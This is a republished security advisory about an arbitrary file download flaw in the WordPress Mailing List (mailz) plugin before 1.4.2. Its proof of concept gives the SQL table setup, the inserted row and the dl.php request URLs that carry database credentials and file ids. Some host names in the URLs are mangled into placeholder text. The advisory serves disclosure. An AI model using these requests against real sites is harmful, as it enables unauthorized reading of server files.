Wordpress插件Mailing List任意文件下载 - 网站安全

 

标题: Mailing List plugin for Wordpress Arbitrary file download 

影响版本:  < 1.4.2 

作者: 6Scan (http://6scan测试数据) security team 

下载 地址: http://wordpress.org/extend/plugins/mailz/ 

官方修正: This advisory is released after the vendor (http://HdhCmsTestzingiri测试数据)  was contacted and fixed the issue promptly. 

概述 : 

Unauthorized users can download arbitrary files from the server using this exploit. 

 

缺陷位于 config.php file, which connects to database with supplied credentials. Database entries are used to retrieve files from host. 

 

#   The bug is in config.php, but accessible from other file. 

示例测试

 

1) Setup mysql database 

 

2) Create table with the next structure: 

 

CREATE TABLE IF NOT EXISTS `phplist_attachment` ( 

 

  `filename` varchar(1024) NOT NULL, 

 

  `mimetype` varchar(1024) NOT NULL, 

 

  `remotefile` varchar(1024) NOT NULL, 

 

  `description` varchar(1024) NOT NULL, 

 

  `size` int(11) NOT NULL, 

 

  `id` int(11) NOT NULL 

 

) ENGINE=InnoDB DEFAULT CHARSET=latin1; 

3) Add this raw into database: 

 

INSERT INTO `phplist_attachment` (`filename`, `mimetype`, `remotefile`, `description`, `size`, `id`) VALUES 

 

('somefile.txt', '', '', '', 0, 0); 

4) Call the script with database parameters and file id to download: 

http://HdhCmsTest2cto测试数据 /wp-content/plugins/mailz/lists/dl.php?wph=localhost&wpdb=test&user=root&wpp=root&id=0 

The credentials are now saved in session, and there is no need to continue passing them: 

http://HdhCmsTest2cto测试数据 /wp-content/plugins/mailz/lists/dl.php?id=1 

http://HdhCmsTest2cto测试数据 /wp-content/plugins/mailz/lists/dl.php?id=2 

http://HdhCmsTest2cto测试数据 /wp-content/plugins/mailz/lists/dl.php?id=3

查看更多关于Wordpress插件Mailing List任意文件下载 - 网站安全的详细内容...